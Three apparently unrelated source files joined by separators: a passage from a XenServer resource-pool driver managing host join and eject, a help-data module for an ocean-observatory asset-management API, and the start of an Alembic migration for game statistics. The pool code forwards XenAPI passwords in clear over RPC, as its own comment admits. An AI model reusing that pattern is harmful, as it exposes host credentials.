                                       kwargs.get('compute_uuid'),
                                       kwargs.get('url'), kwargs.get('user'),
                                       kwargs.get('passwd'))
                # Record the subordinate's XenServer host uuid so it can be
                # looked up again at eject time.
                metadata = {host: kwargs.get('xenhost_uuid'), }
                db.aggregate_metadata_add(context, aggregate.id, metadata)
            elif main_compute and main_compute != host:
                # send rpc cast to main, asking to add the following
                # host with specified credentials.
                forward_request(context, "add_aggregate_host", main_compute,
                                aggregate.id, host,
                                self._host_addr, self._host_uuid)

    def remove_from_aggregate(self, context, aggregate, host, **kwargs):
        """Remove a compute host from an aggregate.

        Mirrors add_to_aggregate: the main ejects subordinates; removing the
        main itself is only allowed once it is the last host, in which case
        the pool is cleared; other hosts forward the request to the main.
        """
        main_compute = aggregate.metadetails.get('main_compute')
        if main_compute == FLAGS.host and main_compute != host:
            # this is the main -> instruct it to eject a host from the pool
            host_uuid = db.aggregate_metadata_get(context, aggregate.id)[host]
            self._eject_subordinate(aggregate.id,
                                    kwargs.get('compute_uuid'), host_uuid)
            db.aggregate_metadata_delete(context, aggregate.id, host)
        elif main_compute == host:
            # Remove main from its own pool -> destroy pool only if the
            # main is on its own, otherwise raise fault. Destroying a
            # pool made only by main is fictional
            if len(aggregate.hosts) > 1:
                # NOTE: this could be avoided by doing a main
                # re-election, but this is simpler for now.
                raise exception.InvalidAggregateAction(
                    aggregate_id=aggregate.id,
                    action='remove_from_aggregate',
                    reason=_('Unable to eject %(host)s '
                             'from the pool; pool not empty')
                    % locals())
            self._clear_pool(aggregate.id)
            for key in ['main_compute', host]:
                db.aggregate_metadata_delete(context, aggregate.id, key)
        elif main_compute and main_compute != host:
            # A main exists -> forward pool-eject request to main
            forward_request(context, "remove_aggregate_host", main_compute,
                            aggregate.id, host,
                            self._host_addr, self._host_uuid)
        else:
            # this shouldn't have happened
            raise exception.AggregateError(aggregate_id=aggregate.id,
                                           action='remove_from_aggregate',
                                           reason=_('Unable to eject %(host)s '
                                                    'from the pool; No main found')
                                           % locals())

    def _join_subordinate(self, aggregate_id, host, compute_uuid, url, user, passwd):
        """Joins a subordinate into a XenServer resource pool.

        Delegates to the 'xenhost' plugin's host_join call, passing both the
        subordinate's XenAPI credentials and this (main) host's credentials.
        Raises AggregateError if the plugin call fails.
        """
        try:
            args = {'compute_uuid': compute_uuid,
                    'url': url,
                    'user': user,
                    'password': passwd,
                    # json-encoded so the plugin receives a proper boolean
                    'force': json.dumps(FLAGS.use_join_force),
                    'main_addr': self._host_addr,
                    'main_user': FLAGS.xenapi_connection_username,
                    'main_pass': FLAGS.xenapi_connection_password, }
            self._session.call_plugin('xenhost', 'host_join', args)
        except self.XenAPI.Failure as e:
            LOG.error(_("Pool-Join failed: %(e)s") % locals())
            raise exception.AggregateError(aggregate_id=aggregate_id,
                                           action='add_to_aggregate',
                                           reason=_('Unable to join %(host)s '
                                                    'in the pool') % locals())

    def _eject_subordinate(self, aggregate_id, compute_uuid, host_uuid):
        """Eject a subordinate from a XenServer resource pool.

        Raises AggregateError if any XenAPI call fails (e.g. because guest
        VMs are still running on the host).
        """
        try:
            # shutdown nova-compute; if there are other VMs running, e.g.
            # guest instances, the eject will fail. That's a precaution
            # to deal with the fact that the admin should evacuate the host
            # first. The eject wipes out the host completely.
            vm_ref = self._session.call_xenapi('VM.get_by_uuid', compute_uuid)
            self._session.call_xenapi("VM.clean_shutdown", vm_ref)
            host_ref = self._session.call_xenapi('host.get_by_uuid', host_uuid)
            self._session.call_xenapi("pool.eject", host_ref)
        except self.XenAPI.Failure as e:
            LOG.error(_("Pool-eject failed: %(e)s") % locals())
            raise exception.AggregateError(aggregate_id=aggregate_id,
                                           action='remove_from_aggregate',
                                           reason=str(e.details))

    def _init_pool(self, aggregate_id, aggregate_name):
        """Set the name label of a XenServer pool.

        Raises AggregateError if the XenAPI call fails.
        """
        try:
            pool_ref = self._session.call_xenapi("pool.get_all")[0]
            self._session.call_xenapi("pool.set_name_label",
                                      pool_ref, aggregate_name)
        except self.XenAPI.Failure as e:
            LOG.error(_("Unable to set up pool: %(e)s.") % locals())
            raise exception.AggregateError(aggregate_id=aggregate_id,
                                           action='add_to_aggregate',
                                           reason=str(e.details))

    def _clear_pool(self, aggregate_id):
        """Clear the name label of a XenServer pool.

        Raises AggregateError if the XenAPI call fails.
        """
        try:
            pool_ref = self._session.call_xenapi('pool.get_all')[0]
            self._session.call_xenapi('pool.set_name_label', pool_ref, '')
        except self.XenAPI.Failure as e:
            LOG.error(_("Pool-set_name_label failed: %(e)s") % locals())
            raise exception.AggregateError(aggregate_id=aggregate_id,
                                           action='remove_from_aggregate',
                                           reason=str(e.details))
def forward_request(context, request_type, main, aggregate_id,
                    subordinate_compute, subordinate_address, subordinate_uuid):
    """Casts add/remove requests to the pool main."""
    # The xenapi connection url may carry an unroutable address
    # (e.g. 169.254.0.1); substitute the subordinate's real address so the
    # main can reach it.
    # NOTE: password in clear is not great, but it'll do for now
    sender_url = swap_xapi_host(FLAGS.xenapi_connection_url, subordinate_address)
    message = {
        "method": request_type,
        "args": {
            "aggregate_id": aggregate_id,
            "host": subordinate_compute,
            "url": sender_url,
            "user": FLAGS.xenapi_connection_username,
            "passwd": FLAGS.xenapi_connection_password,
            "compute_uuid": vm_utils.get_this_vm_uuid(),
            "xenhost_uuid": subordinate_uuid,
        },
    }
    topic = db.queue_get_for(context, FLAGS.compute_topic, main)
    rpc.cast(context, topic, message)
def swap_xapi_host(url, host_addr):
    """Replace the XenServer address present in 'url' with 'host_addr'.

    Any port in the original netloc is preserved.
    """
    parsed = urlparse.urlparse(url)
    old_host, sep, port = parsed.netloc.partition(':')
    new_netloc = '%s%s%s' % (host_addr, sep, port)
    return url.replace(parsed.netloc, new_netloc)
| |
#!/usr/bin/env python
def get_help_data_12587_events():
    """
    Asset Management help - Category 'events'

    Data store of information to be presented when a help request is made for
    port 12587.  Returns a list of dictionaries, one per request supported on
    that port; each entry carries the endpoint, HTTP method, permission flag,
    parameter descriptions ('data_format') and sample request/response pairs.

    Fixes relative to the previous revision (help text only, structure
    unchanged):
      * the 'events/deployment/query' sample request had a mojibake
        character (u'\\xac') where '&not' of '&notes=True' had been mangled;
      * 'Get a a sorted list ...' typo in the cruise-inventory description.
    """
    help_data = [
        # GET events -- full event listing (sample abbreviated to one item).
        {
            'root': 'events',
            'endpoint': 'events',
            'method': 'GET',
            'permission_required': False,
            'description': 'Get a list of all events. Sample response content abbreviated.',
            'data_required': False,
            'data_format': None,
            'samples': [{
                'sample_request': 'events',
                'sample_response': [{
                    "@class": ".CruiseInfo",
                    "uniqueCruiseIdentifier": "AR-04",
                    "cruiseIdentifier": None,
                    "shipName": "R/V Neil Armstrong",
                    "editPhase": "OPERATIONAL",
                    "eventId": 1,
                    "assetUid": None,
                    "eventType": "CRUISE_INFO",
                    "eventName": "AR-04",
                    "eventStartTime": 1463011200000,
                    "eventStopTime": 1464825600000,
                    "notes": "Pioneer 6 (rvdata)",
                    "tense": "UNKNOWN",
                    "dataSource": "Load from [CruiseInformation.xlsx]",
                    "lastModifiedTimestamp": 1495138206531
                }]
            }]
        },
        # GET events/{id} -- single event lookup by numeric identifier.
        {
            'root': 'events',
            'endpoint': 'events/{id}',
            'method': 'GET',
            'permission_required': False,
            'description': 'Get event by identifier. ',
            'data_required': True,
            'data_format': [
                {'name': 'id',
                 'type': 'int',
                 'description': 'The event identifier.',
                 'valid_values': None,
                 'default': None
                 }
            ],
            'samples': [{
                'sample_request': 'events/1',
                'sample_response': {
                    "@class": ".CruiseInfo",
                    "uniqueCruiseIdentifier": "AR-04",
                    "cruiseIdentifier": None,
                    "shipName": "R/V Neil Armstrong",
                    "editPhase": "OPERATIONAL",
                    "eventId": 1,
                    "assetUid": None,
                    "eventType": "CRUISE_INFO",
                    "eventName": "AR-04",
                    "eventStartTime": 1463011200000,
                    "eventStopTime": 1464825600000,
                    "notes": "Pioneer 6 (rvdata)",
                    "tense": "UNKNOWN",
                    "dataSource": "Load from [CruiseInformation.xlsx]",
                    "lastModifiedTimestamp": 1495138206531
                }
            }]
        },
        # GET events/deployment/inv -- deployment subsite inventory.
        {
            'root': 'events',
            'endpoint': 'events/deployment/inv',
            'method': 'GET',
            'permission_required': False,
            'description': 'Get a list of all unique subsites over all deployments. ',
            'data_required': False,
            'data_format': None,
            'samples': [{
                'sample_request': 'events/deployment/inv',
                'sample_response': ["CE01ISSM", "CE01ISSP", "CE02SHBP", "CE02SHSM"]
            }]
        },
        # GET events/deployment/inv/{subsite} -- nodes for a subsite.
        {
            'root': 'events',
            'endpoint': 'events/deployment/inv/{subsite}',
            'method': 'GET',
            'permission_required': False,
            'description': 'Get a list of all unique nodes for a specific subsite over all deployments. ',
            'data_required': True,
            'data_format': [
                {'name': 'subsite',
                 'type': 'str',
                 'description': 'The subsite portion of the reference designator.',
                 'valid_values': None,
                 'default': None
                 }
            ],
            'samples': [{
                'sample_request': 'events/deployment/inv/CE01ISSM',
                'sample_response': ["MFC31", "MFD35", "MFD37", "RID16", "SBC11", "SBD17"]
            }]
        },
        # GET events/deployment/inv/{subsite}/{node} -- sensors for a node.
        {
            'root': 'events',
            'endpoint': 'events/deployment/inv/{subsite}/{node}',
            'method': 'GET',
            'permission_required': False,
            'description': 'Get a list of all unique sensors for a specific subsite and node '
                           'over all deployments.',
            'data_required': True,
            'data_format': [
                {'name': 'subsite',
                 'type': 'str',
                 'description': 'The subsite portion of the reference designator.',
                 'valid_values': None,
                 'default': None
                 },
                {'name': 'node',
                 'type': 'str',
                 'description': 'The node portion of the reference designator.',
                 'valid_values': None,
                 'default': None
                 }
            ],
            'samples': [{
                'sample_request': 'events/deployment/inv/CE01ISSM/MFC31',
                'sample_response': ["00-CPMENG000"]
            }]
        },
        # GET events/deployment/inv/{subsite}/{node}/{sensor} -- deployment numbers.
        {
            'root': 'events',
            'endpoint': 'events/deployment/inv/{subsite}/{node}/{sensor}',
            'method': 'GET',
            'permission_required': False,
            'description': 'Get a list of all unique deployment numbers for a specified subsite, node '
                           'and sensor over all deployments.',
            'data_required': True,
            'data_format': [
                {'name': 'subsite',
                 'type': 'str',
                 'description': 'The subsite portion of the reference designator.',
                 'valid_values': None,
                 'default': None
                 },
                {'name': 'node',
                 'type': 'str',
                 'description': 'The node portion of the reference designator.',
                 'valid_values': None,
                 'default': None
                 },
                {'name': 'sensor',
                 'type': 'str',
                 'description': 'The sensor portion of the reference designator.',
                 'valid_values': None,
                 'default': None
                 }
            ],
            'samples': [{
                'sample_request': 'events/deployment/inv/CE01ISSM/MFC31/00-CPMENG000',
                'sample_response': [1, 2, 3, 6, 7]
            }]
        },
        # GET events/deployment/inv/{subsite}/{node}/{sensor}/{deploymentNumber}
        # -- full deployment records for one reference designator.
        {
            'root': 'events',
            'endpoint': 'events/deployment/inv/{subsite}/{node}/{sensor}/{deploymentNumber}',
            'method': 'GET',
            'permission_required': False,
            'description': 'Get a list of all unique deployment numbers for a specified subsite, node, '
                           'and sensor over all deployments. A deploymentNumber of -1 will return all '
                           'deployments for the reference designator.',
            'data_required': True,
            'data_format': [
                {'name': 'subsite',
                 'type': 'str',
                 'description': 'The subsite portion of the reference designator.',
                 'valid_values': None,
                 'default': None
                 },
                {'name': 'node',
                 'type': 'str',
                 'description': 'The node portion of the reference designator.',
                 'valid_values': None,
                 'default': None
                 },
                {'name': 'sensor',
                 'type': 'str',
                 'description': 'The sensor portion of the reference designator.',
                 'valid_values': None,
                 'default': None
                 },
                {'name': 'deploymentNumber',
                 'type': 'int',
                 'description': 'The deployment number; -1 will return all deployments for '
                                'the reference designator.',
                 'valid_values': None,
                 'default': None
                 }
            ],
            'samples': [{
                'sample_request': 'events/deployment/inv/CE01ISSM/MFC31/00-CPMENG000/1',
                'sample_response': [
                    {
                        "@class": ".XDeployment",
                        "location": {
                            "depth": 25.0,
                            "location": [-124.0956, 44.65828],
                            "latitude": 44.65828,
                            "longitude": -124.0956,
                            "orbitRadius": None
                        },
                        "node": None,
                        "sensor": {
                            "@class": ".XInstrument",
                            "calibration": [],
                            "events": [],
                            "assetId": 2664,
                            "remoteResources": [],
                            "serialNumber": "1",
                            "name": "1",
                            "location": None,
                            "owner": None,
                            "description": "Multi-Function Node Communications and Power Manager",
                            "manufacturer": "WHOI",
                            "notes": None,
                            "uid": "CGCON-MCPM03-00001",
                            "editPhase": "OPERATIONAL",
                            "physicalInfo": {
                                "height": -1.0,
                                "width": -1.0,
                                "length": -1.0,
                                "weight": -1.0
                            },
                            "assetType": "Sensor",
                            "mobile": False,
                            "modelNumber": "CPM",
                            "purchasePrice": None,
                            "purchaseDate": None,
                            "deliveryDate": None,
                            "depthRating": None,
                            "ooiPropertyNumber": None,
                            "ooiPartNumber": None,
                            "ooiSerialNumber": None,
                            "deliveryOrderNumber": None,
                            "institutionPropertyNumber": None,
                            "institutionPurchaseOrderNumber": None,
                            "shelfLifeExpirationDate": None,
                            "firmwareVersion": None,
                            "softwareVersion": None,
                            "powerRequirements": None,
                            "dataSource": "BulkLoad from [sensor_bulk_load-AssetRecord.csv]",
                            "lastModifiedTimestamp": 1495455046865
                        },
                        "referenceDesignator": "CE01ISSM-MFC31-00-CPMENG000",
                        "editPhase": "OPERATIONAL",
                        "deploymentNumber": 1,
                        "versionNumber": 1,
                        "mooring": {
                            "@class": ".XMooring",
                            "events": [],
                            "assetId": 138,
                            "remoteResources": [],
                            "serialNumber": "CE01ISSM-00001",
                            "name": "CE01ISSM-00001",
                            "location": None,
                            "owner": None,
                            "description": "Coastal Endurance Oregon Inshore Surface Mooring",
                            "manufacturer": "WHOI",
                            "notes": None,
                            "uid": "CGMCE-01ISSM-00001",
                            "editPhase": "OPERATIONAL",
                            "physicalInfo": {
                                "height": -1.0,
                                "width": -1.0,
                                "length": -1.0,
                                "weight": -1.0
                            },
                            "assetType": "Mooring",
                            "mobile": False,
                            "modelNumber": "CE01ISSM",
                            "purchasePrice": 318795.53,
                            "purchaseDate": 1361145600000,
                            "deliveryDate": 1361145600000,
                            "depthRating": None,
                            "ooiPropertyNumber": None,
                            "ooiPartNumber": None,
                            "ooiSerialNumber": None,
                            "deliveryOrderNumber": None,
                            "institutionPropertyNumber": None,
                            "institutionPurchaseOrderNumber": None,
                            "shelfLifeExpirationDate": None,
                            "firmwareVersion": None,
                            "softwareVersion": None,
                            "powerRequirements": None,
                            "dataSource": "BulkLoad from [platform_bulk_load-AssetRecord.csv]",
                            "lastModifiedTimestamp": 1495455036366
                        },
                        "deployCruiseInfo": {
                            "@class": ".CruiseInfo",
                            "uniqueCruiseIdentifier": "OC1404B",
                            "cruiseIdentifier": None,
                            "shipName": "R/V Oceanus",
                            "editPhase": "OPERATIONAL",
                            "eventId": 29,
                            "assetUid": None,
                            "eventType": "CRUISE_INFO",
                            "eventName": "OC1404B",
                            "eventStartTime": 1397520000000,
                            "eventStopTime": 1398038400000,
                            "notes": None,
                            "tense": "UNKNOWN",
                            "dataSource": "Load from [CruiseInformation.xlsx]",
                            "lastModifiedTimestamp": 1495455035279
                        },
                        "recoverCruiseInfo": None,
                        "deployedBy": None,
                        "recoveredBy": None,
                        "inductiveId": None,
                        "waterDepth": 25.0,
                        "ingestInfo": [],
                        "eventId": 231,
                        "assetUid": None,
                        "eventType": "DEPLOYMENT",
                        "eventName": "CE01ISSM-MFC31-00-CPMENG000",
                        "eventStartTime": 1397767500000,
                        "eventStopTime": 1408228200000,
                        "notes": None,
                        "tense": "UNKNOWN",
                        "dataSource": "Load from [CE01ISSM_Deploy.xlsx]",
                        "lastModifiedTimestamp": 1495455063059
                    }]
            }]
        },
        # GET events/deployment/query -- parameterized deployment query.
        # (sample_request previously contained a mojibake '\xac' where
        # '&notes=True' had been mangled; corrected here.)
        {
            'root': 'events',
            'endpoint': 'events/deployment/query',
            'method': 'GET',
            'permission_required': False,
            'description': 'Get all deployments for reference designator, whether platform, node '
                           'or instrument.',
            'data_required': True,
            'data_format': [
                {'name': 'refdes',
                 'type': 'str',
                 'description': 'A reference designator.',
                 'valid_values': None,
                 'default': None
                 },
                {'name': 'deploymentnum',
                 'type': 'int',
                 'description': '[Optional] Deployment number. Normally a positive integer. '
                                'Default -1, selects all deployments.',
                 'valid_values': None,
                 'default': None
                 },
                {'name': 'beginDT',
                 'type': 'longint',
                 'description': '[Optional] Start time for filter.',
                 'valid_values': None,
                 'default': None
                 },
                {'name': 'endDT',
                 'type': 'longint',
                 'description': '[Optional] End time for filter.',
                 'valid_values': None,
                 'default': None
                 },
                {'name': 'notes',
                 'type': 'bool',
                 'description': '[Optional] Return notes field value; default is False',
                 'valid_values': None,
                 'default': None
                 }
            ],
            'samples': [{
                'sample_request': 'events/deployment/query?refdes=CE01ISSM-MFC31&deploymentnum=1&notes=True',
                'sample_response': [
                    {
                        "@class": ".XDeployment",
                        "location": {
                            "depth": 25.0,
                            "location": [-124.0956, 44.65828],
                            "latitude": 44.65828,
                            "longitude": -124.0956,
                            "orbitRadius": None
                        },
                        "node": None,
                        "sensor": {
                            "@class": ".XInstrument",
                            "calibration": [],
                            "events": [],
                            "assetId": 2664,
                            "remoteResources": [],
                            "serialNumber": "1",
                            "name": "1",
                            "location": None,
                            "owner": None,
                            "description": "Multi-Function Node Communications and Power Manager",
                            "manufacturer": "WHOI",
                            "notes": "CE01ISSM-0000(1,2)-CPM3",
                            "uid": "CGCON-MCPM03-00001",
                            "editPhase": "OPERATIONAL",
                            "physicalInfo": {
                                "height": -1.0,
                                "width": -1.0,
                                "length": -1.0,
                                "weight": -1.0
                            },
                            "assetType": "Sensor",
                            "mobile": False,
                            "modelNumber": "CPM",
                            "purchasePrice": None,
                            "purchaseDate": None,
                            "deliveryDate": None,
                            "depthRating": None,
                            "ooiPropertyNumber": None,
                            "ooiPartNumber": None,
                            "ooiSerialNumber": None,
                            "deliveryOrderNumber": None,
                            "institutionPropertyNumber": None,
                            "institutionPurchaseOrderNumber": None,
                            "shelfLifeExpirationDate": None,
                            "firmwareVersion": None,
                            "softwareVersion": None,
                            "powerRequirements": None,
                            "dataSource": "BulkLoad from [sensor_bulk_load-AssetRecord.csv]",
                            "lastModifiedTimestamp": 1495455046865
                        },
                        "referenceDesignator": "CE01ISSM-MFC31-00-CPMENG000",
                        "editPhase": "OPERATIONAL",
                        "deploymentNumber": 1,
                        "versionNumber": 1,
                        "mooring": {
                            "@class": ".XMooring",
                            "events": [],
                            "assetId": 138,
                            "remoteResources": [],
                            "serialNumber": "CE01ISSM-00001",
                            "name": "CE01ISSM-00001",
                            "location": None,
                            "owner": None,
                            "description": "Coastal Endurance Oregon Inshore Surface Mooring",
                            "manufacturer": "WHOI",
                            "notes": None,
                            "uid": "CGMCE-01ISSM-00001",
                            "editPhase": "OPERATIONAL",
                            "physicalInfo": {
                                "height": -1.0,
                                "width": -1.0,
                                "length": -1.0,
                                "weight": -1.0
                            },
                            "assetType": "Mooring",
                            "mobile": False,
                            "modelNumber": "CE01ISSM",
                            "purchasePrice": 318795.53,
                            "purchaseDate": 1361145600000,
                            "deliveryDate": 1361145600000,
                            "depthRating": None,
                            "ooiPropertyNumber": None,
                            "ooiPartNumber": None,
                            "ooiSerialNumber": None,
                            "deliveryOrderNumber": None,
                            "institutionPropertyNumber": None,
                            "institutionPurchaseOrderNumber": None,
                            "shelfLifeExpirationDate": None,
                            "firmwareVersion": None,
                            "softwareVersion": None,
                            "powerRequirements": None,
                            "dataSource": "BulkLoad from [platform_bulk_load-AssetRecord.csv]",
                            "lastModifiedTimestamp": 1495455036366
                        },
                        "deployCruiseInfo": {
                            "@class": ".CruiseInfo",
                            "uniqueCruiseIdentifier": "OC1404B",
                            "cruiseIdentifier": None,
                            "shipName": "R/V Oceanus",
                            "editPhase": "OPERATIONAL",
                            "eventId": 29,
                            "assetUid": None,
                            "eventType": "CRUISE_INFO",
                            "eventName": "OC1404B",
                            "eventStartTime": 1397520000000,
                            "eventStopTime": 1398038400000,
                            "notes": "Endurance 1 (rvdata)",
                            "tense": "UNKNOWN",
                            "dataSource": "Load from [CruiseInformation.xlsx]",
                            "lastModifiedTimestamp": 1495455035279
                        },
                        "recoverCruiseInfo": None,
                        "deployedBy": None,
                        "recoveredBy": None,
                        "inductiveId": None,
                        "waterDepth": 25.0,
                        "ingestInfo": [],
                        "eventId": 231,
                        "assetUid": None,
                        "eventType": "DEPLOYMENT",
                        "eventName": "CE01ISSM-MFC31-00-CPMENG000",
                        "eventStartTime": 1397767500000,
                        "eventStopTime": 1408228200000,
                        "notes": None,
                        "tense": "UNKNOWN",
                        "dataSource": "Load from [CE01ISSM_Deploy.xlsx]",
                        "lastModifiedTimestamp": 1495455063059
                    }]
            }]
        },
        # GET events/cruise/inv -- unique cruise identifiers.
        {
            'root': 'events',
            'endpoint': 'events/cruise/inv',
            'method': 'GET',
            'permission_required': False,
            'description': 'Get a list of all unique cruise identifiers in the Asset Management.',
            'data_required': False,
            'data_format': None,
            'samples': [{
                'sample_request': 'events/cruise/inv',
                'sample_response': ["AR-03", "AR-04", "AR-07-01", "AR-08A", "AR-08B", "AR1-07"]
            }]
        },
        # GET events/cruise/inv/{subsite} -- cruises by (partial) subsite.
        {
            'root': 'events',
            'endpoint': 'events/cruise/inv/{subsite}',
            'method': 'GET',
            'permission_required': False,
            'description': 'Get a sorted list of all unique cruise identifiers in Asset Management '
                           'associated with a full or partial deployment subsite identifier.',
            'data_required': True,
            'data_format': [
                {'name': 'subsite',
                 'type': 'str',
                 'description': 'Full or partial subsite (i.e. \'CE01ISSM\' or \'CE\').',
                 'valid_values': None,
                 'default': None
                 }
            ],
            'samples': [{
                'sample_request': 'events/cruise/inv/CE',
                'sample_response': ["AT37-03", "EK-1503", "EK-1506", "EK-1507", "EK-1508"]
            }]
        },
        # GET events/cruise/rec/{uniqueCruiseId} -- single cruise record.
        {
            'root': 'events',
            'endpoint': 'events/cruise/rec/{uniqueCruiseId}',
            'method': 'GET',
            'permission_required': False,
            'description': 'Get a single cruise info record using the unique cruise identifier.',
            'data_required': True,
            'data_format': [
                {'name': 'uniqueCruiseId',
                 'type': 'str',
                 'description': 'The unique cruise identifier.',
                 'valid_values': None,
                 'default': None
                 }
            ],
            'samples': [{
                'sample_request': 'events/cruise/rec/AR-03',
                'sample_response': {
                    "@class": ".CruiseInfo",
                    "uniqueCruiseIdentifier": "AR-03",
                    "cruiseIdentifier": None,
                    "shipName": "R/V Neil Armstrong ",
                    "editPhase": "OPERATIONAL",
                    "eventId": 6,
                    "assetUid": None,
                    "eventType": "CRUISE_INFO",
                    "eventName": "AR-03",
                    "eventStartTime": 1462147200000,
                    "eventStopTime": 1462752000000,
                    "notes": "Pioneer (rvdata)",
                    "tense": "UNKNOWN",
                    "dataSource": "Load from [CruiseInformation.xlsx]",
                    "lastModifiedTimestamp": 1495455035256
                }
            }]
        },
        # GET events/cruise/deployments/{uniqueCruiseId} -- deployments per cruise.
        {
            'root': 'events',
            'endpoint': 'events/cruise/deployments/{uniqueCruiseId}',
            'method': 'GET',
            'permission_required': False,
            'description': 'Get a list of all deployments for a uniqueCruiseId.',
            'data_required': True,
            'data_format': [
                {'name': 'uniqueCruiseId',
                 'type': 'str',
                 'description': 'The unique cruise identifier.',
                 'valid_values': None,
                 'default': None
                 }],
            'samples': [{
                'sample_request': 'events/cruise/deployments/AT-26-29',
                'sample_response': [
                    {
                        "@class": ".XDeployment",
                        "location": {
                            "depth": 12.0,
                            "location": [-89.3575, -54.40833],
                            "latitude": -54.40833,
                            "longitude": -89.3575,
                            "orbitRadius": None
                        },
                        "node": None,
                        "sensor": {
                            "@class": ".XInstrument",
                            "calibration": [],
                            "events": [],
                            "assetId": 3084,
                            "remoteResources": [],
                            "serialNumber": "GS01SUMO-00001-DCL16",
                            "name": "GS01SUMO-00001-DCL16",
                            "location": None,
                            "owner": None,
                            "description": "Near Surface Instrument Frame Data Concentrator Logger",
                            "manufacturer": "WHOI",
                            "notes": None,
                            "uid": "R00065",
                            "editPhase": "OPERATIONAL",
                            "physicalInfo": {
                                "height": -1.0,
                                "width": -1.0,
                                "length": -1.0,
                                "weight": -1.0
                            },
                            "assetType": "Sensor",
                            "mobile": False,
                            "modelNumber": "DCL",
                            "purchasePrice": None,
                            "purchaseDate": None,
                            "deliveryDate": None,
                            "depthRating": None,
                            "ooiPropertyNumber": None,
                            "ooiPartNumber": None,
                            "ooiSerialNumber": None,
                            "deliveryOrderNumber": None,
                            "institutionPropertyNumber": None,
                            "institutionPurchaseOrderNumber": None,
                            "shelfLifeExpirationDate": None,
                            "firmwareVersion": None,
                            "softwareVersion": None,
                            "powerRequirements": None,
                            "dataSource": "BulkLoad from [sensor_bulk_load-AssetRecord.csv]",
                            "lastModifiedTimestamp": 1495455048680
                        },
                        "referenceDesignator": "GS01SUMO-RID16-00-DCLENG000",
                        "editPhase": "OPERATIONAL",
                        "deploymentNumber": 1,
                        "versionNumber": 1,
                        "mooring": {
                            "@class": ".XMooring",
                            "events": [],
                            "assetId": 42,
                            "remoteResources": [],
                            "serialNumber": "GS01SUMO-00001",
                            "name": "GS01SUMO-00001",
                            "location": None,
                            "owner": None,
                            "description": "Global Southern Ocean Apex Surface Mooring",
                            "manufacturer": "WHOI",
                            "notes": None,
                            "uid": "CGMGS-01SUMO-00001",
                            "editPhase": "OPERATIONAL",
                            "physicalInfo": {
                                "height": -1.0,
                                "width": -1.0,
                                "length": -1.0,
                                "weight": -1.0
                            },
                            "assetType": "Mooring",
                            "mobile": False,
                            "modelNumber": "GS01SUMO",
                            "purchasePrice": None,
                            "purchaseDate": None,
                            "deliveryDate": None,
                            "depthRating": None,
                            "ooiPropertyNumber": None,
                            "ooiPartNumber": None,
                            "ooiSerialNumber": None,
                            "deliveryOrderNumber": None,
                            "institutionPropertyNumber": None,
                            "institutionPurchaseOrderNumber": None,
                            "shelfLifeExpirationDate": None,
                            "firmwareVersion": None,
                            "softwareVersion": None,
                            "powerRequirements": None,
                            "dataSource": "BulkLoad from [platform_bulk_load-AssetRecord.csv]",
                            "lastModifiedTimestamp": 1495455036018
                        },
                        "deployCruiseInfo": {
                            "@class": ".CruiseInfo",
                            "uniqueCruiseIdentifier": "AT-26-29",
                            "cruiseIdentifier": None,
                            "shipName": "R/V Atlantis",
                            "editPhase": "OPERATIONAL",
                            "eventId": 9,
                            "assetUid": None,
                            "eventType": "CRUISE_INFO",
                            "eventName": "AT-26-29",
                            "eventStartTime": 1423699200000,
                            "eventStopTime": 1425513600000,
                            "notes": None,
                            "tense": "UNKNOWN",
                            "dataSource": "Load from [CruiseInformation.xlsx]",
                            "lastModifiedTimestamp": 1495455035260
                        },
                        "recoverCruiseInfo": {
                            "@class": ".CruiseInfo",
                            "uniqueCruiseIdentifier": "NBP-15-11",
                            "cruiseIdentifier": None,
                            "shipName": "R/V Nathaniel B. Palmer",
                            "editPhase": "OPERATIONAL",
                            "eventId": 28,
                            "assetUid": None,
                            "eventType": "CRUISE_INFO",
                            "eventName": "NBP-15-11",
                            "eventStartTime": 1449446400000,
                            "eventStopTime": 1451865600000,
                            "notes": None,
                            "tense": "UNKNOWN",
                            "dataSource": "Load from [CruiseInformation.xlsx]",
                            "lastModifiedTimestamp": 1495455035278
                        },
                        "deployedBy": None,
                        "recoveredBy": None,
                        "inductiveId": None,
                        "waterDepth": 4611.0,
                        "ingestInfo": [],
                        "eventId": 3534,
                        "assetUid": None,
                        "eventType": "DEPLOYMENT",
                        "eventName": "GS01SUMO-RID16-00-DCLENG000",
                        "eventStartTime": 1424293560000,
                        "eventStopTime": 1451215200000,
                        "notes": None,
                        "tense": "UNKNOWN",
                        "dataSource": "Load from [GS01SUMO_Deploy.xlsx]",
                        "lastModifiedTimestamp": 1495455092700
                    }]
            }]
        }
    ]
    return help_data
| |
"""Init db
Revision ID: c608894207f9
Revises:
Create Date: 2018-01-15 00:43:49.233788
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = 'c608894207f9'  # unique id of this migration
down_revision = None  # no parent: this is the first migration in the chain
branch_labels = None
depends_on = None
def upgrade():
    """Create the initial schema: the `match` parent table plus its
    per-round detail tables (objectives, deaths, purchases, ...) and the
    malf-module / revsquad-item lookup tables with their association tables.

    Creation order matters: `match`, `malf_module`, `revsquad_item` and
    `badass_bundle_buy` must exist before the tables that reference them
    via foreign keys.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    # Lookup table referenced by the match_malf_module association table.
    op.create_table('malf_module',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(), nullable=True),
    sa.PrimaryKeyConstraint('id')
    )
    # Parent table: one row per parsed game round; every detail table
    # below points back at it through match_id.
    op.create_table('match',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('parsed_file', sa.String(length=255), nullable=False),
    sa.Column('data_version', sa.String(length=45), nullable=True),
    sa.Column('mastermode', sa.String(length=255), nullable=True),
    sa.Column('modes_string', sa.String(length=65535), nullable=True),
    sa.Column('crewscore', sa.Integer(), nullable=True),
    sa.Column('nuked', sa.Boolean(), nullable=True),
    sa.Column('crates_ordered', sa.Integer(), nullable=True),
    sa.Column('blood_spilled', sa.Integer(), nullable=True),
    sa.Column('artifacts_discovered', sa.Integer(), nullable=True),
    sa.Column('tech_total', sa.Integer(), nullable=True),
    sa.Column('mapname', sa.String(), nullable=True),
    sa.Column('borgs_at_roundend', sa.Integer(), nullable=True),
    sa.Column('remaining_heads', sa.Integer(), nullable=True),
    sa.Column('starttime', sa.Integer(), nullable=True),
    sa.Column('endtime', sa.Integer(), nullable=True),
    sa.Column('round_length', sa.Integer(), nullable=True),
    sa.Column('cult_runes_written', sa.Integer(), nullable=True),
    sa.Column('cult_runes_nulled', sa.Integer(), nullable=True),
    sa.Column('cult_runes_fumbled', sa.Integer(), nullable=True),
